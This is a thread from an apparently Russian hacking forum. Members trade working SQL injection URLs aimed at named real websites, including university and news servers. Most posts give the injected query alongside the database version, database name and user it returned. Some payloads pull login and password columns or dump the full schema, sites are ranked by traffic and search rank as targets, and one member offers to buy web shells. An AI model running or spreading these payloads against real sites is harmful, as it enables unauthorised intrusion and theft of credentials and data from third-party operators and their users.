SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Тиц1800, пр5, Blind mysqlinj, траф 7к+
    Code:
    http://www.vand.ru/index.php?country=64&sub=64+and(1)=1%23
    version()>=5
    _____________________
    Траф 7к. Blind mysqlinj
    Code:
    http://www.2avia.ru/?p=hot&rai=2+and+1=1--
    _____________________
    Тиц900, пр4, 30к+ траф
    Code:
    http://old.mastercity.ru/news/news.php?sel_id=20100705172731 and null+UNION SELECT 1,2,3,4,5,version()--+
    4.1.20-log
     
    1 person likes this.
  2. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Code:
    http://www.shinamir.ru/index.php?pageId=92222{SQLINJ}
    Database Version: 5.0.90-log
    Database name: u261330_shinamir
    User name: [email protected]



    Code:
    http://www.tgkoleso.ru/index.php?pageId=4
    Database Version: 4.0.26-log
    Database name: udb4037
    User name: Uwww4037S@localhost

    Code:
    http://www.eurofamily.ru/french/?pageId=8111{SQLINJ}
    Database Version: 5.0.77-log
    Database name: eurofamily
    User name: eurofamily@localhost
     
    #14162 Byrger, 17 Sep 2011
    Last edited: 17 Sep 2011
    1 person likes this.
  3. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    engr.msstate.edu PR-5

    Code:
    http://www.engr.msstate.edu/media/news/index.php?newsID=-512+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12+--+
    Code:
    5.0.45:admin@localhost:webdb
    pakistantimes.net PR-5

    Code:
    http://pakistantimes.net/pt/detail.php?newsId=-22412+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
    Code:
    5.0.77-log:[email protected]:pakistantimes
    themeparkreview.com PR-5

    Code:
    http://www.themeparkreview.com/parks/page.php?pageid=-368+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6+--+
    Code:
    5.1.40:freelance@localhost:themepar_parkphoto
    (ответ в сорсе в теге <font>)
     
    2 people like this.
  4. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Code:
    http://www.inter-shina.ru/index.php?pageId=1111{SQLINJ}
    Database Version: 5.0.90-log
    Database name: u261330_inter
    User name: [email protected]
     
  5. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    http://old914.fc-zenit.ru/info/Video.phtml?id=1'+and+extractvalue(0x3b,concat(0x3b,(select+concat_ws(0x3a,version(),user()))))--+&video=1
     
    2 people like this.
  6. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www2.utah.edu/podcast/indivAudiocast.php?acId=-217'+union+select+1,2,3,4,5,6,7,8,version(),0,11,12,13,14,15,16/*
    Database Version: 4.0.17-standard-log
    Database name: podcast
    User name: [email protected]
     
    2 people like this.
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    4.0.24-standard:[email protected]:wcfcourier_com
     
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    PR 2 ТИц 20
    Database Version: 5.0.51a-24+lenny5
    Database name: avtokraskaru_avtokraskaru
    User name: avto_user@localhost



    PR 4 ТИц 160
    Database Version: 5.0.90-log
    Database name: u24363
    User name: [email protected]

    PR 0 ТИц 0
    Database Version: 5.1.57
    Database name: worldsale
    User name: worldsale@localhost

    PR 2 ТИц 30
    Database Version: 5.0.87
    Database name: rain_malbi
    User name: rain@localhost

    2 Сайта на борту PR 5 ТИц 50 и PR 0 ТИц 10
    Version 5.0.67

    PR 1 ТИц 0
    Database Version: 4.1.25-log
    Database name: freemp3_slovo
    User name: [email protected]

    PR 1 ТИц 0
    Database Version: 4.0.27-standard-log
    Database name: fastrunn_automobile
    User name: fastrunn_root@localhost

    PR 1 ТИц 0
    Database Version: 5.1.43
    Database name: vslovoco_vslovo
    User name: vslovoco_vslovo@localhost

    Database Version: 4.1.25-log
    Database name: freemp3_slovo
    User name: [email protected]

    Database Version: 5.0.92-community-log
    Database name: texnosta_texno
    User name: texnosta_texno@localhost





    P.S. приму в дар шеллы тиц 10-30 или выкуплю (спасибо)
     
    #14168 Byrger, 19 Sep 2011
    Last edited: 19 Sep 2011
  9. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
     
  10. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://www.sovazs.com/shownews.phtml?id=-1+union+select+1,2,3,4,password,login,7+from+access

    тИц 150, пр 4
     
  11. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    Ваше сообщение слишком короткое. Оно должно быть не менее 4 символов
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Database Version: 5.0.70-log
    Database name: gb_x_vel_es
    User name: [email protected]


    Database Version: 5.0.26-log
    Database name: rubin69
    User name: rubin69@localhost


    Database Version: 4.0.26
    Database name: jetcharterru
    User name: [email protected]

    Похоже на офф сайт русского радио - астрахань
    Database Version: 5.0.26-log
    Database name: astrakhanru
    User name: astrakhanru@localhost
     
    #14172 Byrger, 19 Sep 2011
    Last edited: 19 Sep 2011
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    http://www.sustainpack.com/news.php?id=-67%29+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

    BD: db1081415_SustainPack
     
    1 person likes this.
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Database Version: 5.1.56-log
    Database name: ajvengo_db
    User name: ajvengo_user@localhost

    Database Version: 5.1.41-log
    Database name: elgaucho_elgaucho
    User name: [email protected]

    Database Version: 5.1.56-log
    Database name: russianr_site
    User name: russianr_rugby@localhost
     
    #14174 Byrger, 19 Sep 2011
    Last edited: 19 Sep 2011
  15. Boobby

    Boobby Member

    Joined:
    10 Aug 2011
    Messages:
    0
    Likes Received:
    20
    Reputations:
    5
    http://www.apc.ru/cgi-bin/news_full.cgi?id=102 6000 тиц
     
    1 person likes this.
  16. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    пр=4

     
    #14176 BLurpi^_^, 20 Sep 2011
    Last edited: 20 Sep 2011
  17. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    тиЦ 750 PR 5 Трафик 1К
    Current User: [email protected]

    Sql Version: 5.0.87

    Data Bases: information_schema
    aen_ru
    mysql

    ТИЦ 450 PR 4
    Current User: yarnovos_novosti@localhost

    Sql Version: 5.0.51a-24+lenny5-log

    Data Bases: information_schema
    yarnovos_novost
     
    #14177 aydin-ka, 20 Sep 2011
    Last edited: 20 Sep 2011
    1 person likes this.
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    5.0.91-log:thegroove:[email protected]


    http://www.ruscombe.org/calendar_detail.php?id=10+UNION+SELECT+1,concat(user_type,0x2e,user_username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users--
     
  19. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 275 PR 6
    Current User: bibl@localhost

    Sql Version: 5.1.51

    Data Bases: information_schema
    bibl
     
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Просто хостер.

    http://www.qlayer.net/press_center/id-99+union+select+1,user(),3,4,5.htm
     
Thread Status:
Not open for further replies.